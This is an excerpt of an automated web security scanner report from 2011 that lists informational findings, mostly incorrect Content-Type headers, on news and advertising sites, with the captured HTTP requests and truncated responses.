GET /2/nbc.com/ac@Bottom3 HTTP/1.1
Host: premium.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:01 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 230
Content-Type: text/html

<SCRIPT TYPE="text/javascript" language="JavaScript">
var xaval = 'n';
document.write('<iframe src="http://www.nbcudigitaladops.com/hosted/util/setRemoteDomainCookies.html?xa='+xaval+'" width=0 heig
...[SNIP]...

28.23. http://shop2.sprint.com/assets/olsvideo/mediaPlayer.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shop2.sprint.com
Path:	/assets/olsvideo/mediaPlayer.html

Request

GET /assets/olsvideo/mediaPlayer.html HTTP/1.1
Host: shop2.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 04 Sep 2011 01:23:54 GMT
Content-type: text/html
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
   <head>
       <title>Sprint Media Player</title>
       <script type="text/javascript">
           function Querystring(qs) { // optionally p
...[SNIP]...

28.24. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://snas.nbcuni.com
Path:	/snas/api/getRemoteDomainCookies

Request

Response

28.25. https://subscriberservices.mcclatchy.com/char/transactiontype.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://subscriberservices.mcclatchy.com
Path:	/char/transactiontype.asp

Request

GET /char/transactiontype.asp HTTP/1.1
Host: subscriberservices.mcclatchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

28.26. http://video.od.visiblemeasures.com/log previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://video.od.visiblemeasures.com
Path:	/log

Request

GET /log?m=USM2WGACdk8oUH9yAQgEc3sGCHQKAAp2E1RVJU1AQFwPAGYCcXcHBQBwcgh3BQQJcQVkN0EEAHBzBAl%2FBQYLdA0DBWJdVEZYFwUFQFU0CgATMCNXIVhdcCUJcmYAfAZzcAAOcAMACnMAAwl3CgYUTEFVMQ1wBHF2DHN1f3UHBn9xBnV6c38IdntyDX9zB3oFAgF0AQ13cH92A3oDEiJWRFRnd381VkAEcRItIVhcUjcLVQR3AQYNdAwFAXcIDQcLFwMCARIiVkRUZ3d%2FNUBYBHIEcmYAfARzchddJ0ZWHXFzQlQ3BFZaWEBcLERAI1hSRicwTyBFV1wvUTAqUR9aJjsMWnJUAQp9BFFScA9RAwhXACEBByMHAAR7IAAjBgUOIwFkIEYEAHBzBAl%2FBQYLdQ0HAg%3D%3D&p=1 HTTP/1.1
Host: video.od.visiblemeasures.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=300&height=500&flashID=myExperience&bgcolor=%23F4F4F4&wmode=opaque&dynamicStreaming=true&videoSmoothing=true&playerID=1055201224001&publisherID=315980433&isVid=true&autoStart=false&isUI=true&allowScriptAccess=always&debuggerID=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sun, 04 Sep 2011 00:44:53 GMT
Content-Type: text/html
Content-Length: 11
Last-Modified: Tue, 01 Mar 2011 06:21:43 GMT
X-Cnection: close
Accept-Ranges: bytes

objectid=1

28.27. http://www.charlotteobserver.com/search/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.charlotteobserver.com
Path:	/search/

Request

GET /search/ HTTP/1.1
Host: www.charlotteobserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Content-Type: text/html
Expires: Sun, 04 Sep 2011 01:25:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:25:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64465

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>

<SCRIPT LANGUAGE="JavaScript">
<!--
var gomez=
...[SNIP]...

28.28. http://www.nbcudigitaladops.com/hosted/util/setRemoteDomainCookies.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nbcudigitaladops.com
Path:	/hosted/util/setRemoteDomainCookies.html

Request

GET /hosted/util/setRemoteDomainCookies.html?xa=n HTTP/1.1
Host: www.nbcudigitaladops.com
Proxy-Connection: keep-alive
Referer: http://premium.mookie1.com/2/nbc.com/ac@Bottom3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 1122
Cache-Control: max-age=300
Expires: Sun, 04 Sep 2011 00:55:25 GMT
Date: Sun, 04 Sep 2011 00:50:25 GMT
Connection: close

<script>
function sc(cd,cn,ch){
if(cn==undefined){
return false;
}
   var expires = '';
if(ch!=undefined){
       var d = new Date;
       d.setHours(d.getHours()+ch);
       ex
...[SNIP]...

28.29. http://www.newslibrary.com/nlsearch.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newslibrary.com
Path:	/nlsearch.asp

Request

GET /nlsearch.asp HTTP/1.1
Host: www.newslibrary.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

28.30. http://www.reuters.com/resources/r/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/resources/r/

Request

GET /resources/r/ HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:27:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.0
Vary: Accept-Encoding
Content-Length: 16
Connection: close
Content-Type: text/html

Illegal: d - msg

28.31. http://www.usatoday.com/community/profile.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.usatoday.com
Path:	/community/profile.htm

Request

GET /community/profile.htm HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

28.32. http://www.usatoday.com/marketing/feedback.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.usatoday.com
Path:	/marketing/feedback.htm

Request

GET /marketing/feedback.htm HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

28.33. http://www.usatoday.com/marketing/questions.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.usatoday.com
Path:	/marketing/questions.htm

Request

GET /marketing/questions.htm HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

29. Content type incorrectly stated previous next
There are 32 instances of this issue:

http://ad.doubleclick.net/clk
http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5
http://blogs.reuters.com/wp-content/widgets/rtrxtra/rac.php
http://cdn.taboolasyndication.com/libtrc/reuters/rbox.en.4-8-2-1-48560.json
http://d3fd89.r.axf8.net/mr/e.gif
http://espn.go.com/dallas/ncf/preview
http://goku.brightcove.com/1pix.gif
http://imp.fetchback.com/serve/fb/adtag.js
http://js.www.reuters.com/recommend/re/fp
http://media.charlotteobserver.com/static/dealsaver/widget/images/dealsaver_td_logo.png
http://mediacdn.disqus.com/1314991730/fonts/disqus-webfont.woff
http://rt.disqus.com/forums/realtime-cached.js
http://rt.legolas-media.com/lgrt
http://rtq.careerbuilder.com/RTQ/jobstream.aspx
http://search.charlotteobserver.com/search-bin/search.pl.cgi
http://search2.sacbee.com/search-bin/search.pl.cgi
http://sitelife.usatoday.com/ver1.0/sys/jsonp.app
http://snas.nbcuni.com/snas/api/getRemoteDomainCookies
http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard
http://static.mcclatchyinteractive.com/creative/fns/widgets/images/deal_placeholder.jpg
http://trc.taboolasyndication.com/reuters/trc/2/json
http://urls.api.twitter.com/1/urls/count.json
http://video.od.visiblemeasures.com/log
http://www.facebook.com/extern/login_status.php
http://www.nbcudigitaladops.com/hosted/util/getRemoteDomainCookies.js
http://www.reuters.com/assets/breakingNews
http://www.reuters.com/assets/info
http://www.reuters.com/assets/searchIntercept
http://www.reuters.com/assets/sharedModuleLoader
http://www.reuters.com/resources/r/
http://www.sprint.com/favicon.ico
http://www.wunderground.com/auto/sacbeeXML/geo/WXCurrentObXML/index.xml

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

29.1. http://ad.doubleclick.net/clk previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.doubleclick.net
Path:	/clk

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /clk HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Error: Not a valid request
Content-Type: text/html
Content-Length: 45
Date: Sun, 04 Sep 2011 01:21:46 GMT
Server: GFE/2.0
Connection: close

<h1>Error 500 Error: Not a valid request</h1>

29.2. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/13966-88303-3335-5

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /ad/js/13966-88303-3335-5?mpt=1119678&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/3/0/%2a/x%3B245665919%3B0-0%3B1%3B43087964%3B3454-728/90%3B43451397/43469184/1%3B%3B%7Eokv%3D%3Btype%3Dleaderboard%3Bsz%3D728x90%3Btile%3D1%3Bvbc%3Dcfa%3BarticleID%3DUSTRE78222D20110903%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo3=3484:36959; mojo2=3484:8030

Response

29.3. http://blogs.reuters.com/wp-content/widgets/rtrxtra/rac.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://blogs.reuters.com
Path:	/wp-content/widgets/rtrxtra/rac.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /wp-content/widgets/rtrxtra/rac.php HTTP/1.1
Host: blogs.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Cachetype: Cached-with-(null)
Content-Length: 914
Connection: close
Content-Type: text/html; charset=UTF-8

[{ "id": "365484", "author": "DSI", "comment": "Turkey didn't send any ships to Gaza. It was an independent ship run by some humanitarian foundation. Case here is not the Israil attacking Turkish ship
...[SNIP]...

29.4. http://cdn.taboolasyndication.com/libtrc/reuters/rbox.en.4-8-2-1-48560.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cdn.taboolasyndication.com
Path:	/libtrc/reuters/rbox.en.4-8-2-1-48560.json

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain CSS.

Request

Response

29.5. http://d3fd89.r.axf8.net/mr/e.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://d3fd89.r.axf8.net
Path:	/mr/e.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript; charset=utf-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /mr/e.gif?info=%7Bn%3Ac%7Cc%3A207062696683182%7Cd%3A1%7Ca%3AD3FD89%7Ch%3A1%7Ce%3ACharlotte%20Observer%7Cb%3Astory-detail%7Cl%3Ahttp%24*%24%2F%2Fwww.charlotteobserver.com%2F2011%2F09%2F03%2F2577566%2Fraceday-danica-already-gone.html%7Cm%3A1920%7Co%3A1200%7Cp%3AWin32%7Cg%3AChrome%7Cf%3A13.0.782.220%7D%7Bn%3Au%7Ce%3A1%7D&a=D3FD89&r=1&s=1 HTTP/1.1
Host: d3fd89.r.axf8.net
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 41
Content-Type: application/x-javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:44:05 GMT

gomez.b3(0,0.01);if(gomez.n0)gomez.n0(1);

29.6. http://espn.go.com/dallas/ncf/preview previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://espn.go.com
Path:	/dallas/ncf/preview

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /dallas/ncf/preview HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60
Date: Sun, 04 Sep 2011 01:22:27 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sun, 04 Sep 2011 01:22:27 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: N723
Cache-Expires: Sun, 04 Sep 2011 01:23:27 GMT
Content-Length: 4
Connection: close

null

29.7. http://goku.brightcove.com/1pix.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://goku.brightcove.com
Path:	/1pix.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a GIF image.

Request

GET /1pix.gif?dcsdat=1315097126249&playerURL=http%3A//s3.cinesport.com/players/charlotteobservergeneric.html&flashVer=WIN%2010%2C3%2C183%2C7&lang=en&dcssip=&dcsref=http%3A//cdn.cinesport.com/container.html%3Fid%3Dcharlotteobservergeneric&os=Windows%20Server%202008%20R2&playerId=1055201224001&playerTag=&publisherId=315980433&time=1987&affiliateId=&mem=66220&sourceId=315980433&dcsuri=/viewer/player_load HTTP/1.1
Host: goku.brightcove.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=300&height=500&flashID=myExperience&bgcolor=%23F4F4F4&wmode=opaque&dynamicStreaming=true&videoSmoothing=true&playerID=1055201224001&publisherID=315980433&isVid=true&autoStart=false&isUI=true&allowScriptAccess=always&debuggerID=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:12:44 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 14:35:23 GMT
Content-Length: 49
Content-Type: text/plain

GIF89a...................!.......,...........T..;

29.8. http://imp.fetchback.com/serve/fb/adtag.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://imp.fetchback.com
Path:	/serve/fb/adtag.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

29.9. http://js.www.reuters.com/recommend/re/fp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://js.www.reuters.com
Path:	/recommend/re/fp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /recommend/re/fp?ed=us&type=article&id=USTRE78222D20110903&howMany=5&callback=Reuters.utils.showRecommendations&refreshUrlTimestamp=1315097053383 HTTP/1.1
Host: js.www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:54 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 00:50:55 GMT
max-age: 300000
Content-Type: text/plain
Content-Length: 1592

if (typeof Reuters.utils.showRecommendations === 'function') {Reuters.utils.showRecommendations([{"assetType":"article","id":"USTRE78225U20110903","score":0.45668233713901946,"headline":"Michigan foot
...[SNIP]...

29.10. http://media.charlotteobserver.com/static/dealsaver/widget/images/dealsaver_td_logo.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://media.charlotteobserver.com
Path:	/static/dealsaver/widget/images/dealsaver_td_logo.png

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /static/dealsaver/widget/images/dealsaver_td_logo.png HTTP/1.1
Host: media.charlotteobserver.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Last-Modified: Wed, 08 Jun 2011 19:28:04 GMT
ETag: "5dc716-844-4defcd44"
Accept-Ranges: bytes
Content-Length: 2116
Content-Type: image/png
Date: Sun, 04 Sep 2011 00:44:07 GMT
Connection: close

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

............................................................................................................x..
...[SNIP]...

29.11. http://mediacdn.disqus.com/1314991730/fonts/disqus-webfont.woff previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://mediacdn.disqus.com
Path:	/1314991730/fonts/disqus-webfont.woff

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /1314991730/fonts/disqus-webfont.woff HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: disqus_unique=608614822849; __qca=P0-943627109-1315055753168; __utma=113869458.1840189074.1315055753.1315055753.1315055753.1; __utmz=113869458.1315055753.1.1.utmcsr=frankgruber.me|utmccn=(referral)|utmcmd=referral|utmcct=/post/9680693152/the-view-looking-out-from-techcocktail-boston-at

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 02 Sep 2011 20:23:42 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Access-Control-Allow-Origin: *
Content-Type: text/plain
Vary: Accept-Encoding
Content-Length: 5304
X-Varnish: 1644025771 1634998852
Cache-Control: max-age=2572652
Expires: Mon, 03 Oct 2011 19:41:50 GMT
Date: Sun, 04 Sep 2011 01:04:18 GMT
Connection: close

wOFF...............`........................FFTM...l........Z.V.GDEF........... .Y..OS/2.......E...`t.f.cmap................cvt .......6...6 ...fpgm...........e../.gasp................glyf...........p
...[SNIP]...

29.12. http://rt.disqus.com/forums/realtime-cached.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://rt.disqus.com
Path:	/forums/realtime-cached.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /forums/realtime-cached.js?timestamp=2011-09-03_20:39:40&thread_id=404039983&f=charlotteobserver&1315097121163 HTTP/1.1
Host: rt.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: disqus_unique=608614822849; __qca=P0-943627109-1315055753168; __utma=113869458.1840189074.1315055753.1315055753.1315055753.1; __utmz=113869458.1315055753.1.1.utmcsr=frankgruber.me|utmccn=(referral)|utmcmd=referral|utmcct=/post/9680693152/the-view-looking-out-from-techcocktail-boston-at

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 01:05:19 GMT
Content-Type: application/x-javascript
Content-Length: 67
Last-Modified: Mon, 17 Jan 2011 19:57:15 GMT
Connection: close
Accept-Ranges: bytes

DISQUS.dtpl.actions.fire("realtime.update", "2010-12-08_19:48:43")

29.13. http://rt.legolas-media.com/lgrt previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://rt.legolas-media.com
Path:	/lgrt

Issue detail

The response contains the following Content-type statement:

Content-Type: application/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

Response

29.14. http://rtq.careerbuilder.com/RTQ/jobstream.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://rtq.careerbuilder.com
Path:	/RTQ/jobstream.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR35
Date: Sun, 04 Sep 2011 00:44:05 GMT
Connection: close
Content-Length: 6162

// declaration
var cb_jobstream_title;
var cb_jobstream_title_bg
var cb_jobstream_title_font
var cb_jobstream_border;
var cb_jobstream_width;
var cb_jobstream_height;
var cb_jobstream_main_bgco
...[SNIP]...

29.15. http://search.charlotteobserver.com/search-bin/search.pl.cgi previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://search.charlotteobserver.com
Path:	/search-bin/search.pl.cgi

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /search-bin/search.pl.cgi HTTP/1.1
Host: search.charlotteobserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:23:44 GMT
Server: Apache/1.3.41
Vary: Accept-Encoding
Expires: Sat, 03 Sep 2011 01:23:44 GMT
Mi-app-host: rdds021p
Content-Type: text/html; charset=ISO-8859-1
X-Cache: MISS from search.charlotteobserver.com
Connection: close
Content-Length: 262

<h1>Search Error</h1>
<b>Could not retrieve Error Template.</b><br>
Error template:
<br>
error_template not set.

<p>
<b>Search Error(s)</b><br>
No live_template parameter specified. at /nm/local/mi/
...[SNIP]...

29.16. http://search2.sacbee.com/search-bin/search.pl.cgi previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://search2.sacbee.com
Path:	/search-bin/search.pl.cgi

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /search-bin/search.pl.cgi HTTP/1.1
Host: search2.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:23:49 GMT
Server: Apache/1.3.41
Vary: Accept-Encoding
Expires: Sat, 03 Sep 2011 01:23:49 GMT
Mi-app-host: rdds017p
Content-Type: text/html; charset=ISO-8859-1
X-Cache: MISS from search2.sacbee.com
Connection: close
Content-Length: 262

<h1>Search Error</h1>
<b>Could not retrieve Error Template.</b><br>
Error template:
<br>
error_template not set.

<p>
<b>Search Error(s)</b><br>
No live_template parameter specified. at /nm/local/mi/
...[SNIP]...

29.17. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/sys/jsonp.app

Issue detail

The response contains the following Content-type statement:

Content-Type: application/javascript

The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=545853.blog&clientUrl=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
